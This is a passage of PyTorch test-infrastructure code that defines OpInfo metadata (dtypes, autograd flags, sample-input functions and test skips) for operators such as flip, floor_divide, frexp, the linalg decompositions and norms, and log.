supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, ), OpInfo('istft', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_istft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, decorators=( DecorateInfo(unittest.skip("Skipped! istft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), ), skips=( skipCPUIfNoFFT, # gradcheck fails on ROCm (gh-68429) # grad is computed improperly (probably for weights tensor) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), )), UnaryUfuncInfo('floor', ref=np.floor, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('flip', op=torch.flip, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_flip, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('fliplr', op=torch.fliplr, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_fliplr, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('flipud', op=torch.flipud, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_flipud, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('sparse.sampled_addmm', dtypes=floating_and_complex_types(), supports_autograd=True, sample_inputs_func=sample_inputs_sparse_sampled_addmm, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 3), "cusparseSDDMM was added in 11.2.1"), skipCPUIfNoMklSparse, ], skips=( # NotImplementedError: Tensors of type SparseCsrTensorImpl do not have is_contiguous DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # RuntimeError: Sparse CSR tensors do not have strides. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # RuntimeError: sampled_addmm: Expected result to have sparse csr layout, but got Strided DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out_warning'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_operator'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_backward'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: unsupported memory format option Preserve DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), UnaryUfuncInfo('i0', ref=np_unary_ufunc_integer_promotion_wrapper( scipy.special.i0) if TEST_SCIPY else _NOTHING, aliases=('special.i0',), decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_i0_i1, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), )), UnaryUfuncInfo('special.i0e', aten_name='special_i0e', ref=scipy.special.i0e if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 3e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.i1', aten_name='special_i1', ref=np_unary_ufunc_integer_promotion_wrapper(scipy.special.i1) if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, decorators=( DecorateInfo(toleranceOverride({ torch.float32: tol(atol=1e-4, rtol=0), torch.bool: tol(atol=1e-4, rtol=0)})), ), skips=( DecorateInfo(unittest.skip("Incorrect result!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), ), supports_fwgrad_bwgrad=True, supports_forward_ad=True), UnaryUfuncInfo('special.i1e', aten_name='special_i1e', ref=scipy.special.i1e if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.ndtr', aten_name='special_ndtr', decorators=(precisionOverride({torch.bfloat16: 5e-3, torch.float16: 5e-4}),), ref=scipy.special.ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Dispatch stub: unsupported device typemeta DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='meta'), )), BinaryUfuncInfo('floor_divide', ref=_floor_divide_np, dtypes=all_types_and(torch.half, torch.bfloat16), supports_autograd=False, rhs_make_tensor_kwargs=dict(exclude_zero=True), supports_two_python_scalars=True, skips=( # AssertionError: Results of original model and exported/imported version of model differed DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), # bfloat16 floor_divide compared with a float32 reference works inconsistently DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', dtypes=(torch.bfloat16,)), # int8 floor divide has different results for -128 // -1 vs. NumPy DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)), # The following tests fails on some jobs DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.float16,)), )), UnaryUfuncInfo('frexp', op=torch.frexp, ref=np.frexp, dtypes=floating_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), # skip testing torch.frexp as it is not supported by ROCm platform yet decorators=[], supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # skips below tests as torch.frexp returns tuple-like (mantissa, exponent) as outputs, # while theses tests currently requires output to a single tensor. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_batch_vs_slicing'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_every_other'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_contig_vs_transposed'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_non_contig_expand'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_variant_consistency'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), # skips test_reference_numerics due to error in Windows CI. # The np.frexp returns exponent as np.intc dtype on Windows platform, # and np.intc does not have the correspond torch dtype DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=IS_WINDOWS), )), BinaryUfuncInfo('ge', ref=np.greater_equal, aliases=('greater_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('geqrf', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], supports_autograd=False, skips=( # FIXME: geqrf can't forward with complex inputs that require grad DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_dtypes'), # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), BinaryUfuncInfo('gt', ref=np.greater, aliases=('greater',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), UnaryUfuncInfo('imag', ref=np.imag, dtypes=complex_types_and(torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # See https://github.com/pytorch/pytorch/issues/66357 # RuntimeError: view_as_real doesn't work on unresolved conjugated tensors. check_batched_forward_grad=False, skips=( # Skip since real and imag don't have out variants. DecorateInfo(unittest.expectedFailure, 'TestUnaryUfuncs', 'test_out_arg_all_dtypes'), )), OpInfo('gradient', dtypes=floating_and_complex_types_and(torch.int8, torch.int16, torch.int32, torch.int64, torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # following tests give a runtime error with undefined value tensor # see discussion : https://github.com/pytorch/pytorch/issues/56660 # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, torch.complex64)), # noqa: B950 DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_gradient, error_inputs_func=error_inputs_gradient), OpInfo('inverse', op=torch.inverse, dtypes=floating_and_complex_types(), check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', '.test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', '.test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('isin', dtypes=all_types(), dtypesIfCUDA=all_types_and(torch.half), supports_autograd=False, sample_inputs_func=sample_inputs_isin), OpInfo('kthvalue', dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kthvalue, error_inputs_func=error_inputs_kthvalue), BinaryUfuncInfo('le', ref=np.less_equal, aliases=('less_equal',), dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), always_returns_bool=True, supports_autograd=False,), OpInfo('linalg.det', op=torch.linalg.det, aliases=('det',), dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False), OpInfo('linalg.det', op=torch.linalg.det, variant_test_name='singular', aliases=('det',), dtypes=double_types(), backward_dtypes=double_types(), aten_name='linalg_det', sample_inputs_func=sample_inputs_linalg_det_singular, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)}))], check_batched_gradgrad=False, supports_inplace_autograd=False, skips=( # These tests started breaking after touching the SVD. DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cpu', dtypes=(torch.complex128,), active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # dtypes are tested in the suite above, no need to repeat it for singular DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), )), OpInfo('linalg.cholesky', aten_name='linalg_cholesky', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],), OpInfo('linalg.cholesky_ex', aten_name='linalg_cholesky_ex', dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], ), OpInfo('linalg.cond', aten_name='linalg_cond', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cond, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off],), OpInfo('linalg.eig', aten_name='linalg_eig', op=torch.linalg.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eig, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], ), OpInfo('linalg.eigvals', aten_name='linalg_eigvals', op=torch.linalg.eigvals, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), # exits early on eager extremal value test DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigh', aten_name='linalg_eigh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off], skips=( # Forward-over-reverse gradgrad might be incorrect DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.eigvalsh', aten_name='linalg_eigvalsh', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_eigh, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.householder_product', aten_name='linalg_householder_product', op=torch.linalg.householder_product, aliases=('orgqr', ), dtypes=floating_and_complex_types(), # TODO: backward uses in-place operations that vmap doesn't like check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, sample_inputs_func=sample_inputs_householder_product, decorators=[ skipCUDAIfNoCusolver, skipCPUIfNoLapack, DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-3, rtol=1e-3)})), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ]), OpInfo('linalg.ldl_factor', aten_name='linalg_ldl_factor', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_factor_ex', aten_name='linalg_ldl_factor_ex', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_factor, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, skipCUDAIfRocm], ), OpInfo('linalg.ldl_solve', aten_name='linalg_ldl_solve', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_ldl_solve, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 4), "not available before CUDA 11.3.1"), skipCUDAIfNoCusolver, skipCUDAIfRocm, skipCPUIfNoLapack], ), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', dtypes=floating_and_complex_types(), supports_out=True, sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # we skip gradient checks for this suite as they are tested in # variant_test_name='grad_oriented' DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), # The values for attribute 'shape' do not match DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.lstsq', aten_name='linalg_lstsq', variant_test_name='grad_oriented', # gradchecks for forward AD fails with multi-Tensor outputs op=lambda a, b, driver: torch.linalg.lstsq(a, b, driver=driver)[0], supports_out=False, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_lstsq, error_inputs_func=error_inputs_lstsq, supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # tests do not work with passing lambda for op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), # At this time ROCm uses magma instead of rocSolver, and the test passes DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward', active_if=(not TEST_WITH_ROCM)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=(not TEST_WITH_ROCM)), )), OpInfo('linalg.matrix_power', aliases=('matrix_power',), aten_name='linalg_matrix_power', dtypes=floating_and_complex_types(), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_power, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # Strides are not the same! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), )), OpInfo('linalg.multi_dot', # Need this lambda because gradcheck does not work with TensorList inputs aten_name='linalg_multi_dot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_inplace_autograd=False, # Batched grad checks fail for empty input tensors (see https://github.com/pytorch/pytorch/issues/53407) check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_linalg_multi_dot, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples'), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal! DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), # NB: linalg.norm has two variants so that different skips can be used for different sample inputs OpInfo('linalg.norm', op=torch.linalg.norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_norm, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, aten_name='linalg_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('linalg.norm', op=torch.linalg.norm, variant_test_name='subgradients_at_zero', dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=partial(sample_inputs_linalg_norm, variant='subgradient_at_zero'), aten_name='linalg_norm', supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # [NEW] Skips specifically for sample inputs at zero # norm's vjp/jvp are not well-conditioned near zero DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, "TestGradients", 'test_fn_fwgrad_bwgrad') )), OpInfo('linalg.matrix_norm', aten_name='linalg_matrix_norm', dtypes=floating_and_complex_types(), check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], sample_inputs_func=sample_inputs_linalg_matrix_norm), OpInfo('linalg.qr', aten_name='linalg_qr', op=torch.linalg.qr, dtypes=floating_and_complex_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, # In-place ops check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_qr_geqrf, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack]), OpInfo('linalg.slogdet', aten_name='linalg_slogdet', op=torch.linalg.slogdet, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_slogdet, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('linalg.vander', aten_name='linalg_vander', ref=np_vander_batched, op=torch.linalg.vander, dtypes=all_types_and_complex(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, sample_inputs_func=sample_inputs_linalg_vander), ReductionOpInfo( 'linalg.vector_norm', op=torch.linalg.vector_norm, identity=0, nan_policy='propagate', supports_multiple_dims=True, complex_to_real=True, supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), generate_args_kwargs=sample_kwargs_vector_norm, aten_name='linalg_vector_norm', skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # FIXME: sum reduces all dimensions when dim=[] DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty'), DecorateInfo(unittest.expectedFailure, 'TestReductions', 'test_dim_empty_keepdim'), )), UnaryUfuncInfo('log', ref=np.log, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log10', ref=np.log10, domain=(0, None), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), assert_autodiffed=True, dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), ), # log10(z)->-inf for |z|->0 reference_numerics_filter=NumericsFilter(condition=lambda x: torch.abs(x) < 0.1, safe_val=1)), UnaryUfuncInfo('log1p', ref=np.log1p, aliases=('special.log1p',), domain=(-1, None), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 1e-1}),), skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('log2', ref=np.log2, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, 